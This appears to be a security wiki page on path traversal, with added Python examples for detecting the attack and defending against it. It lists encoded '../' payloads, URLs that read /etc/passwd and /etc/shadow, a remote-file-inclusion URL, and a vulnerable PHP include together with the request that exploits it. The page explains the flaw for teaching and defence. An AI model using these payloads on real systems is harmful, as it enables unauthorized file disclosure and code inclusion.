Path Traversal
Revision as of 16:51, 5 November 2007
Description
This attack aims to access files and directories that are stored outside the web root folder. By browsing the application, one should look for absolute links to files stored on the web server and observe how those files are referenced. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and their variations, it is possible to access arbitrary files and directories on the file system, including application source code, configuration files and critical system files, limited only by the operating system's access controls on the web server process. The idea is to use "../" sequences to move up to the root directory and from there navigate through the file system.
The attack can also carry externally hosted malicious code injected into the path, in the manner of a Resource Injection attack, but the underlying weakness is still path traversal.
This attack is also known as "dot-dot-slash", "directory traversal", "directory climbing" and "backtracking".
No specific tool is needed to perform this attack, but a spider/crawler is recommended to discover all the URLs the application exposes.
Request variations
Encoding and double encoding:
    %2e%2e%2f represents ../
    %2e%2e/ represents ../
    ..%2f represents ../
    %2e%2e%5c represents ..\
    %2e%2e\ represents ..\
    ..%5c represents ..\
    %252e%252e%255c represents ..\ (double encoded)
    ..%255c represents ..\ (double encoded)
    and so on.
Unicode/UTF-8 encoding (only for systems that accept these overlong UTF-8 sequences):
    ..%c0%af represents ../
    ..%c1%9c represents ..\
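As an added example (not part of the original page), the following Python decodes each of the variations listed above the way a lenient server might: repeated percent-decoding followed by acceptance of overlong two-byte UTF-8 sequences. It also shows why a filter that percent-decodes exactly once misses the double-encoded forms. The table of variants, the three-round decode cap and the function names are assumptions made for this illustration.

```python
import urllib.parse

# Constructed table of the request variations listed on this page: each encoded
# form paired with the traversal sequence a vulnerable server ends up seeing.
VARIANTS = [
    ("%2e%2e%2f", "../"),
    ("%2e%2e/", "../"),
    ("..%2f", "../"),
    ("%2e%2e%5c", "..\\"),
    ("%2e%2e\\", "..\\"),
    ("..%5c", "..\\"),
    ("%252e%252e%255c", "..\\"),   # double encoded
    ("..%255c", "..\\"),           # double encoded
    ("..%c0%af", "../"),           # overlong UTF-8 for '/'
    ("..%c1%9c", "..\\"),          # overlong UTF-8 for '\'
]


def decode_overlong_utf8(data: bytes) -> bytes:
    """Mimic a lenient decoder that accepts two-byte overlong UTF-8 sequences
    (lead byte 0xC0 or 0xC1, which strict UTF-8 forbids). Every other byte is
    passed through unchanged."""
    out = bytearray()
    i = 0
    while i < len(data):
        lead = data[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(data) and data[i + 1] & 0xC0 == 0x80:
            out.append(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)


def canonicalize(segment: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded by max_rounds, an
    assumption for this example), then apply the lenient overlong decode."""
    data = segment.encode("utf-8")
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return decode_overlong_utf8(data).decode("utf-8", errors="replace")


def contains_traversal(segment: str) -> bool:
    """True if the fully decoded value contains a ../ or ..\\ sequence."""
    text = canonicalize(segment)
    return "../" in text or "..\\" in text


def single_pass_catches(segment: str) -> bool:
    """What a filter that percent-decodes exactly once would conclude."""
    text = urllib.parse.unquote(segment)
    return "../" in text or "..\\" in text


if __name__ == "__main__":
    for encoded, plain in VARIANTS:
        print(f"{encoded:18} -> {canonicalize(encoded)!r}  (expected {plain!r}, "
              f"single-pass filter catches it: {single_pass_catches(encoded)})")
```

The bounded decode loop is a detection heuristic, not a sanitizer: a safe file-serving routine should canonicalize the final filesystem path and check that it stays inside the intended directory rather than try to enumerate every encoding of "..".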
OS specific
UNIX
    Root directory: "/"
    Directory separator: "/"
WINDOWS
    Root directory: "<partition letter>:\"
    Directory separator: "/" or "\"
Severity
High
Likelihood of exploitation
High
Examples
Example 1
To identify whether this attack is possible, observe how the application references the resources it uses. The following examples show some typical situations:
    http://some_site.com.br/get-files.jsp?file=report.pdf
    http://some_site.com.br/get-page.php?home=aaa.html
    http://some_site.com.br/some-page.asp?page=index.html
In these examples a malicious string can be inserted as the parameter value to access files located outside the web-published directory, e.g.:
    http://some_site.com.br/get-files?file=../../../../some dir/some file
Or
    http://some_site.com.br/../../../../some dir/some file
The following URLs show examples of *NIX password file exploitation:
    http://some_site.com.br/../../../../etc/shadow
    http://some_site.com.br/get-files?file=/etc/passwd
Note: On Windows, "../" sequences can only reach files on the partition that holds the web root, whereas on Linux the whole disk can be traversed (subject to file permissions).
Example 2
It is also possible to include files and scripts located on an external website:
    http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php
Example 3
This example illustrates a case in which the attacker makes the server display the CGI script's own source code:
    http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi
Example 4
This example was taken from: Wikipedia - Directory Traversal
A typical example of vulnerable application code is:
    <?php
    $template = 'blue.php';
    if ( isset( $_COOKIE['TEMPLATE'] ) )
        $template = $_COOKIE['TEMPLATE'];
    include ( "/home/users/phpguru/templates/" . $template );
    ?>
An attack against this system could be to send the following HTTP request:
    GET /vulnerable.php HTTP/1.0
    Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Generating a server response such as:
    HTTP/1.0 200 OK
    Content-Type: text/html
    Server: Apache

    root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
    daemon:*:1:1::/tmp:
    phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
The repeated ../ sequences after /home/users/phpguru/templates/ cause include() to traverse up to the root directory and then include the UNIX password file /etc/passwd.
/etc/passwd is the file most commonly used to demonstrate directory traversal: it is world-readable, so it exists and can be read on practically every UNIX system, and historically it held the password hashes that attackers tried to crack offline (modern systems keep those in /etc/shadow).
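The PHP above, re-expressed as an added Python example (not the page's own code): vulnerable_load concatenates the untrusted value exactly as the include() does, while safe_load resolves the path with realpath and rejects any result that leaves the template directory, which also covers absolute inputs and symlinks planted inside the directory. The directory layout, file names, file contents and function names are constructed for this illustration.

```python
import os
import tempfile


def vulnerable_load(template_dir: str, template: str) -> str:
    """Same logic as the PHP include() above: the untrusted value is appended to
    a fixed directory by string concatenation and opened without any check."""
    with open(template_dir + "/" + template, "rb") as f:
        return f.read().decode()


def safe_load(template_dir: str, template: str) -> str:
    """Hardened form: resolve ../ and symlinks with realpath, then require the
    result to still lie inside template_dir. os.path.join discards the base when
    its second argument is absolute, so it is the containment check, not join,
    that stops an input such as '/etc/passwd'."""
    base = os.path.realpath(template_dir)
    target = os.path.realpath(os.path.join(base, template))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"rejected {template!r}: resolves outside {base}")
    with open(target, "rb") as f:
        return f.read().decode()


def build_demo_tree() -> tuple:
    """Constructed layout for this example: <root>/templates/blue.php plus
    <root>/secret.txt standing in for a file outside the published directory."""
    root = tempfile.mkdtemp()
    template_dir = os.path.join(root, "templates")
    os.makedirs(template_dir)
    with open(os.path.join(template_dir, "blue.php"), "w") as f:
        f.write("<h1>blue</h1>")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/sh")   # constructed stand-in for /etc/passwd
    return root, template_dir


def demo() -> dict:
    """Run both loaders against a normal name and against traversal inputs."""
    root, template_dir = build_demo_tree()
    results = {
        "vulnerable_normal": vulnerable_load(template_dir, "blue.php"),
        "vulnerable_traversal": vulnerable_load(template_dir, "../secret.txt"),
        "safe_normal": safe_load(template_dir, "blue.php"),
    }
    # Only ValueError counts as 'rejected': the check must fire before open().
    for attack in ("../secret.txt",
                   "../../../../../../../../../etc/passwd",
                   "/etc/passwd"):
        try:
            safe_load(template_dir, attack)
            results[attack] = "allowed"
        except ValueError:
            results[attack] = "rejected"
    # A symlink inside the directory that points outside it is caught by realpath.
    link = os.path.join(template_dir, "link.php")
    try:
        os.symlink(os.path.join(root, "secret.txt"), link)
    except (OSError, NotImplementedError):
        results["symlink"] = "unsupported"
    else:
        try:
            safe_load(template_dir, "link.php")
            results["symlink"] = "allowed"
        except ValueError:
            results["symlink"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:40} {value}")
```

Where the set of templates is fixed, an allowlist of bare file names is stricter still; the realpath-plus-containment check is the general form for directories whose contents change.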
External References
- http://cwe.mitre.org/data/definitions/22.html
- http://www.webappsec.org/projects/threat/classes/path_traversal.shtml
- http://cve.mitre.org/docs/plover/SECTION.9.6.html#PATH.TRAV
Related Threats
Category: Information Disclosure
Related Attacks
Related Vulnerabilities
Category:Input Validation Vulnerability